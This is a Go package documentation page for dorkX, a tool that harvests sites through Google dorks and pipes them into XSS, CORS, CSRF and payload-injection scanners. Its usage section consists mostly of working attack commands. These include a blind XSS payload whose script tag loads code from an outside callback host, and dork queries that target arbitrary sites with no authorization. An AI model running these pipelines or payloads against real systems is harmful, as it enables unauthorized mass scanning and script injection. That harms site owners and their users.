Categorygithub.com/ethicalhackingplayground/dorkx
modulepackage
0.0.0-20200625014330-c21927c76b49
Repository: https://github.com/ethicalhackingplayground/dorkx.git
Documentation: pkg.go.dev

# README

dorkX

Pipe different tools with google dork Scanner

Version 1.0

Image from Gyazo

Image from Gyazo

Install

zoid@MSI ~/dorkX> git clone https://github.com/ethicalhackingplayground/dorkX

zoid@MSI ~/dorkX> cd dorkX

zoid@MSI ~/dorkX> go build dorkx.go

zoid@MSI ~/dorkX> go build corsx.go

zoid@MSI ~/dorkX> go build csrfx.go

zoid@MSI ~/dorkX> go build zin.go

Usage:

Blind XSS

zoid@MSI ~/dorkX> ./dorkX -dorks dorks.txt -concurrency 100 | dalfox pipe -b '"><script src=https://z0id.xss.ht></script>'

Image from Gyazo

XSS

zoid@MSI ~/dorkX> ./dorkx -dorks dorks.txt | dalfox pipe

zoid@MSI ~/dorkX> ./dorkx -dork "inurl:index.php?id" | dalfox pipe

Cors

zoid@MSI ~/dorkX> ./dorkx -dorks dorks.txt | ./corsx

zoid@MSI ~/dorkX> ./dorkx -dork "inurl:index.php?id" | ./corsx

CSRF

zoid@MSI ~/dorkX> ./dorkx -dorks dorks.txt | ./csrfx

zoid@MSI ~/dorkX> ./dorkx -dork "inurl:index.php?id" | ./csrfx

Payload Injection

zoid@MSI ~/dorkX> ./dorkx -dorks dorks.txt | ./zin -pL <payloadList>

zoid@MSI ~/dorkX> ./dorkx -dork "inurl:index.php?id" |./zin -p <payload>

If you get a bounty please support by buying me a coffee

Buy Me A Coffee

# Functions

No description provided by the author

# Variables

No description provided by the author
No description provided by the author
No description provided by the author
No description provided by the author
No description provided by the author
No description provided by the author
No description provided by the author
No description provided by the author
No description provided by the author

# Structs

No description provided by the author